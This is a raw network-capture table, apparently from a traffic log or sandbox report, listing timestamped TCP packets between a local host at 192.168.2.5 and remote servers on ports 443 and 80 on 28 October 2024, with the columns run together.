                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.634123087 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.634139061 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837059975 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837084055 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837173939 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837229013 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837265015 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837464094 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837755919 CET4434983613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837917089 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837924957 CET4434983613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837928057 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837992907 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837994099 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.837992907 CET49836443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.838071108 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.838071108 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.838092089 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.838210106 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.838927031 CET49836443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.838962078 CET4434983613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.838988066 CET49836443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.839004040 CET4434983613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.840800047 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.840861082 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.840890884 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.840907097 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.840939999 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.840948105 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.841011047 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.842050076 CET4434983713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.842109919 CET4434983713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.843663931 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.843740940 CET49837443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.843810081 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.844537973 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.844549894 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.844561100 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.844572067 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.844584942 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.844588041 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.844620943 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.844651937 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.845391989 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.845403910 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.845415115 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.845427036 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.845438004 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.845443010 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.845455885 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.845469952 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.845479012 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.845514059 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.846250057 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.846261024 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.846319914 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.846395969 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.846421957 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.846463919 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.846482038 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.846498966 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.846525908 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.847408056 CET4434983913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.847696066 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.847712994 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.847726107 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.847738981 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.847759962 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.847786903 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.847806931 CET4434983913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.847877026 CET49839443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848198891 CET49839443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848253965 CET4434983913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848283052 CET49839443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848299026 CET4434983913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848583937 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848628998 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848702908 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848721027 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848764896 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848782063 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848820925 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.848845005 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849567890 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849580050 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849580050 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849617004 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849642038 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849680901 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849704981 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849872112 CET49837443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849889994 CET4434983713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849912882 CET49837443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.849922895 CET4434983713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.850420952 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.850433111 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.850487947 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.850548983 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.850569010 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.850644112 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.850644112 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.850652933 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.850692987 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.851497889 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.851511955 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.851589918 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.853230000 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.853249073 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.853336096 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.853343010 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.853384018 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.853728056 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.853750944 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.855068922 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.855086088 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.859530926 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.859579086 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.859602928 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.859612942 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.859656096 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.859832048 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.860258102 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.884012938 CET49843443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.884037018 CET4434984313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.884141922 CET49843443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.886259079 CET49844443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.886318922 CET4434984413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.886518955 CET49844443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.886643887 CET49843443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.886657000 CET4434984313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.886825085 CET49844443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.886854887 CET4434984413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.888048887 CET49845443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.888092995 CET4434984513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.888427019 CET49845443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.888647079 CET49845443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.888669968 CET4434984513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.907768011 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.907782078 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.907793999 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.907828093 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.907864094 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.908365965 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.908377886 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.908418894 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.936625957 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.936671019 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.936727047 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.936753035 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.936769009 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.936894894 CET49846443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.936934948 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.936940908 CET4434984613.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.937009096 CET49846443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.937655926 CET49846443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.937684059 CET4434984613.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.977020025 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.977061987 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.977075100 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.977092981 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.977135897 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.008918047 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.008970976 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009017944 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009031057 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009071112 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009285927 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009298086 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009309053 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009327888 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009347916 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009382010 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009807110 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.009865999 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.028785944 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.028810024 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.028948069 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.028959990 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.029000998 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.056915045 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.056987047 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.056989908 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.057019949 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.057050943 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.057085037 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.062968016 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.063026905 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.063074112 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.063083887 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.063100100 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.063106060 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.063168049 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.063174963 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.063692093 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.063745975 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.065386057 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.065399885 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.065412045 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.065418959 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.094691992 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.094743967 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.094782114 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.094835043 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.174889088 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.174938917 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.174968004 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.174976110 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.175009012 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.175018072 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.233419895 CET4434984113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.235012054 CET49841443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.235027075 CET4434984113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.235456944 CET49841443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.235460997 CET4434984113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.267014980 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.267065048 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.267121077 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.267132998 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.267163992 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.267179966 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278255939 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278274059 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278287888 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278316975 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278364897 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278645039 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278656960 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278666973 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278678894 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278698921 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.278728008 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.279377937 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.279390097 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.279401064 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.279412985 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.279424906 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.279433012 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.279436111 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.279481888 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.279481888 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.280528069 CET49847443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.280626059 CET4434984713.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.280704975 CET49847443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.280850887 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.280863047 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.280873060 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.280886889 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.280910015 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.280965090 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.281162977 CET49848443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.281189919 CET4434984813.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.281245947 CET49848443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:31.281474113 CET49849443192.168.2.513.107.246.57
